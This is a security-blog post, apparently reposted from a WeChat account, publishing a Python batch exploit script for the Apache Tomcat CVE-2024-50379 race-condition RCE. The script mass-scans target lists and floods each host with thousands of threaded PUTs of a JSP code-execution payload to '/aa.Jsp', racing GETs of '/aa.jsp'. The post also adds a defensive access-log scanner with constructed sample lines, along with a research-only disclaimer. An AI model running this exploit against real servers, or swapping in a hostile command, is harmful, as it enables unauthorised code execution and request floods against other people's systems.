Apache Tomcat (CVE-2024-50379) race condition remote code execution vulnerability: batch detection script

admin, 2024-12-23 14:32:45
0x01 Tool overview

A batch detection script for the Apache Tomcat race condition remote code execution vulnerability (CVE-2024-50379).

0x02 Installation and usage

1. Batch detection:

python poc.py -f url.txt

2. Single-target detection:

python poc.py -u your-ip

0x03 POC
import requests
import urllib3
from urllib.parse import urljoin
import argparse
import ssl
import concurrent.futures

ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    protocols = ['http://', 'https://']
    found_vulnerabilities = False

    for protocol in protocols:
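        # str.lstrip() strips a character set, not a prefix, so remove the scheme explicitly
        host = url.strip()
        for prefix in ('http://', 'https://'):
            if host.startswith(prefix):
                host = host[len(prefix):]
        target_url = urljoin(protocol + host, "/")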
        print(f"Checking {target_url}...")

        target_url_put1 = urljoin(target_url, "/aa.Jsp")
        target_url_put2 = urljoin(target_url, "/bb.Jsp")
        target_url_get1 = urljoin(target_url, "/aa.jsp")
        target_url_get2 = urljoin(target_url, "/bb.jsp")

        headers1 = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Content-Type": "application/json"
        }

        headers2 = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
        }
        payload_put = "aa<% Runtime.getRuntime().exec(\"calc.exe\");%>"

        # Add threads
        with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
            futures = []
            # Loop 10000 times
            for _ in range(10000):  
                futures.append(executor.submit(requests.put, target_url_put1, verify=False, headers=headers1, data=payload_put))
                futures.append(executor.submit(requests.put, target_url_put2, verify=False, headers=headers1, data=payload_put))
                futures.append(executor.submit(requests.get, target_url_get1, verify=False, headers=headers2))
                futures.append(executor.submit(requests.get, target_url_get2, verify=False, headers=headers2))

            for future in concurrent.futures.as_completed(futures):
                try:
                    response = future.result()
                    print(f"Response status: {response.status_code}")
                    if isinstance(response, requests.Response):
                        if (response.status_code == 201) or (response.status_code == 200):
                            found_vulnerabilities = True
                except Exception as e:
                    print(f"Error occurred: {e}")

            if found_vulnerabilities:
                print(f"\033[31mFind: {url}: Apache Tomcat CVE-2024-50379 Conditional Competition To RCE!\033[0m")
                return True

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")
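
A defender-side counterpart, added here and not part of the original script: it scans Tomcat access logs for the request pattern the POC above generates, namely repeated PUTs to a case-variant name such as /aa.Jsp together with GETs of the lowercase /aa.jsp from the same client. The log format (the AccessLogValve "common" pattern), the function names and the sample log lines are assumptions constructed for this example.

```python
import re
from collections import defaultdict

# Assumed format: Tomcat AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b)
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
JSP_EXTS = ('jsp', 'jspx')

def extension(path):
    """Extension of the request path, query string removed."""
    return path.split('?', 1)[0].rsplit('.', 1)[-1]

def is_case_variant_jsp(path):
    """True for .Jsp/.JSP/.jSp..., False for the canonical lowercase .jsp."""
    ext = extension(path)
    return ext.lower() in JSP_EXTS and ext != ext.lower()

def find_race_attempts(lines, min_puts=3):
    """Flag clients that PUT a case-variant JSP name and GET its lowercase twin."""
    puts, gets, written = defaultdict(int), defaultdict(int), set()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        path = m['path'].split('?', 1)[0]
        key = (m['client'], path.lower())
        if m['method'] == 'PUT' and is_case_variant_jsp(path):
            puts[key] += 1
            if m['status'] in ('201', '204'):  # write accepted by the server
                written.add(key)
        elif m['method'] == 'GET' and extension(path) in JSP_EXTS:
            gets[key] += 1
    return {k: {'puts': n, 'gets': gets[k], 'written': k in written}
            for k, n in puts.items() if n >= min_puts and gets[k] > 0}

# Constructed sample log lines (not captured from a real system)
SAMPLE_LOG = """\
203.0.113.7 - - [23/Dec/2024:14:00:01 +0800] "PUT /aa.Jsp HTTP/1.1" 201 -
203.0.113.7 - - [23/Dec/2024:14:00:01 +0800] "GET /aa.jsp HTTP/1.1" 404 682
203.0.113.7 - - [23/Dec/2024:14:00:01 +0800] "PUT /aa.Jsp HTTP/1.1" 204 -
203.0.113.7 - - [23/Dec/2024:14:00:02 +0800] "PUT /aa.Jsp HTTP/1.1" 409 -
203.0.113.7 - - [23/Dec/2024:14:00:02 +0800] "GET /aa.jsp HTTP/1.1" 200 2
198.51.100.4 - - [23/Dec/2024:14:00:04 +0800] "PUT /upload/report.pdf HTTP/1.1" 201 -
""".splitlines()

if __name__ == "__main__":
    for (client, path), hit in find_race_attempts(SAMPLE_LOG).items():
        print(f"{client} {path}: {hit}")
```

A hit with 'written': True means the server accepted at least one of the PUTs, so the webapp directory on that host should be checked for unexpected JSP files.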

Originally published on the WeChat official account (Web安全工具库): Apache Tomcat (CVE-2024-50379) race condition remote code execution vulnerability batch detection script

 

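Disclaimer: The programs (methods) covered in this article may be offensive in nature and are intended for security research and teaching only. Readers who use this information for other purposes bear full legal and joint liability; this site bears no legal or joint liability. If there are any issues, contact us by email (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).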